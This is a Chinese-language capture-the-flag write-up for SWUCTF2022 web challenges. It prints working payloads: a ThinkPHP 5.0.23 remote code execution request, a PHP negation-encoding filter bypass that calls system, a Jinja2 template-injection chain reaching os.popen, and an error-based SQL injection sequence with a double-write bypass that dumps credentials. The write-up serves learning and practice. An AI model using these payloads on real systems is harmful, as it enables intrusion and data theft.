
SWUCTF2022 Web Writeups | CTF
SWU解题记录,太菜了太菜了,哭哭
THINKPHP?
?s=captcha
V5.0.23
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=env |
PHP? Eval?
<?php |
URL编码取反绕过
php -r "var_dump(urlencode(~'system'));" => string(18) "%8C%86%8C%8B%9A%92" |
?cmd=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98); |
Py?py
{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['eval']("__import__('os').popen('cat flag.txt').read()")}} |
SQL? no sqlmap
报错注入
'or(updatexml(1,concat(0x7e,version(),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2Cversion%28%29%2C0x7e%29%2C1%29%29%23 |
~10.3.18-MariaDB~
'or(updatexml(1,concat(0x7e,database(),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2Cdatabase%28%29%2C0x7e%29%2C1%29%29%23 |
~vaalacat~
'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28select%28group_concat%28table_name%29%29from%28information_schema.tables%29where%28table_schema%29like%28database%28%29%29%29%2C0x7e%29%2C1%29%29%23 |
过滤了 select
双写绕过
'or(updatexml(1,concat(0x7e,(selselectect(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28selselectect%28group_concat%28table_name%29%29from%28information_schema.tables%29where%28table_schema%29like%28database%28%29%29%29%2C0x7e%29%2C1%29%29%23 |
~vaala~
'or(updatexml(1,concat(0x7e,(selselectect(group_concat(column_name))from(information_schema.columns)where(table_name)like('vaala')),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28selselectect%28group_concat%28column_name%29%29from%28information_schema.columns%29where%28table_name%29like%28%27vaala%27%29%29%2C0x7e%29%2C1%29%29%23 |
~id,username,password~
'or(updatexml(1,concat(0x7e,(selselectect(group_concat(username,'~',password))from(vaala)),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28selselectect%28group_concat%28username%2C%27~%27%2Cpassword%29%29from%28vaala%29%29%2C0x7e%29%2C1%29%29%23 |
‘~vaala~flag{ccb506e8-afa0-46b8-b’
'or(updatexml(1,concat(0x7e,(selselectect(group_concat((right(password,30))))from(vaala)),0x7e),1))# => %27or%28updatexml%281%2Cconcat%280x7e%2C%28selselectect%28group_concat%28%28right%28password%2C30%29%29%29%29from%28vaala%29%29%2C0x7e%29%2C1%29%29%23 |
‘8-afa0-46b8-b177-e3a2fc5592b6}‘
flag{ccb506e8-afa0-46b8-b177-e3a2fc5592b6}
-
感谢你赐予我前进的力量
赞赏者名单
因为你们的支持让我意识到写文章的价值🙏
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 放养平凡
评论